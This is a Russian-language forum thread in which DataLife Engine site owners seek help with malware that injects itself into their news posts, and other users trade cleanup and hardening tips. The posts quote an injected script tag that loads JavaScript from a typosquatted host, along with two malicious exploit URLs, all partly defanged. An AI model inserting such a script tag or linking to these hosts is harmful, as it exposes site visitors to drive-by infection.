Ищу Борьба с Вирусом

Тема в разделе "DLE", создана пользователем Кексойд, 3 фев 2011.

Информация :
Актуальная версия DataLife Engine 11.3
( Final Release v.11.3 | Скачать DataLife Engine | Скачать 11.3 demo )
Нужно ли обновляться | Как обновиться | Изменения в шаблонах
> Нет русских символов <
[Приватная тема DLE (Все подробности в ЛС к модератору раздела)]

Версии 11.2 и ниже - уязвимы!

Локализации | F.A.Q. | Внешний вид
Правила раздела | Правила форума
Обсуждение хайда карается баном!
В каждом сообщении указывайте версию DLE, которого они касаются!
Статус темы:
Закрыта.
Модераторы: killoff
  1. Кексойд

    Кексойд Постоялец

    Регистр.:
    2 июн 2008
    Сообщения:
    59
    Симпатии:
    3
    Помогите. У меня сия проблема, загружаю новости все нормально, проходит какое-то время и к новости короткой и полной приписыватся скрипт.

    <script src="http://gooog lle.org/77ecf8b2b0e0c8c035 0ec52877066bcb . js" type="text/javascript"></script>

    Помогите найти с чего это все вылезает. Заранее спасибо
     
  2. failometr

    failometr Постоялец

    Регистр.:
    30 апр 2009
    Сообщения:
    128
    Симпатии:
    45
    Давай в личку фтп и аську, могу сейчас поковырять.
     
  3. Rodimus

    Rodimus Создатель

    Регистр.:
    15 сен 2008
    Сообщения:
    32
    Симпатии:
    1
    Та же проблема.
    Выяснил, что вирь прописывает себя в БД в вп-пост в конец поста - так что чистить все посты нужно :(
    Как этот скрипт туда попал - пока не разобрался.
    После чистки 29-го выскочил сегодня опять.. 3 дня ...
     
  4. Sudba

    Sudba

    Регистр.:
    6 дек 2007
    Сообщения:
    868
    Симпатии:
    45
    Смотрю у всех проблема с этим вирусом. я обновился на 9.0 надеюсь поможет)
    по поводу чистки вот фаил удаляет скриптик)
     

    Вложения:

    Los_lolopos, Ilekor и andre740 нравится это.
  5. Кексойд

    Кексойд Постоялец

    Регистр.:
    2 июн 2008
    Сообщения:
    59
    Симпатии:
    3
    Весь прикол в том что у меня и стояла 9-ка
     
  6. Egor109

    Egor109 Постоялец

    Регистр.:
    27 сен 2006
    Сообщения:
    140
    Симпатии:
    11
    - смена пароля базы (позаковырестей пароль сделайте)
    - проверка всех папок на хостинге на наличие инородных папок, я смотрю по дате изменения папки (FileZilla)
    - ИМХО ноги растут из темы про уязвимость DLE когда левые админы появляются.

    или Целсофт мстит за пользование нуллами.
     
  7. StoryTeller

    StoryTeller

    Регистр.:
    26 янв 2009
    Сообщения:
    293
    Симпатии:
    46
    Кексойд,
    Попробуйте скопировать всей файлы с хостинга и проверить их антиврем.
    + стандартным дле антивирусом, лишние фалы в ручную почистите и усё будет окай.
    А вот новости как избавить я не разобрался пришлось чистить в ручную каждую новость хорошо что их около 700 было, а не так как на другом более 1500 :)

    И в сети есть темы про уязвимости версий ниже 9.0.
    Даже на самом дле сайте есть раздел.
    Пользуйтесь поиском не ленитесь.
     
  8. suoixon

    suoixon Создатель

    Регистр.:
    8 сен 2008
    Сообщения:
    32
    Симпатии:
    2
    Вирус

    Движок DLE 7.3
    Вот такую гадость ловлю на сайте, при этом не всегда вылазиет (плавает по сайту). Ну могу понять где она может сидеть или вообще от чего она... Может кто знает?
    Самое интересное адреса расположения вируса меняются...
    Вот позавчера:
    Exploit.HTML.CVE-2010-1885.ad
    http : // jakd. cz. cc /games/hcp_asx.php?f=110
    Вот вчера:
    Exploit.HTML.CVE-2010-1885.ad
    http : // ded4 .cz .cc /games/hcp_asx.php?f=111
    Плавает по сайту, вылазиет когда захочет...
     
  9. LIFE!

    LIFE!

    Регистр.:
    26 окт 2008
    Сообщения:
    244
    Симпатии:
    38
    Теперь становится ясно , что уязвимость скорее всего на ДЛЕ 9.0 потому, что у меня сейчас 8.5 на VPS стоит , посещалка болле 7000 ,

    левых админов (слава Богу! ) нет.

    8.5 сейчас stable


    Всё ИМХО
     
  10. ya-maker

    ya-maker Постоялец

    Регистр.:
    11 янв 2011
    Сообщения:
    60
    Симпатии:
    20
Статус темы:
Закрыта.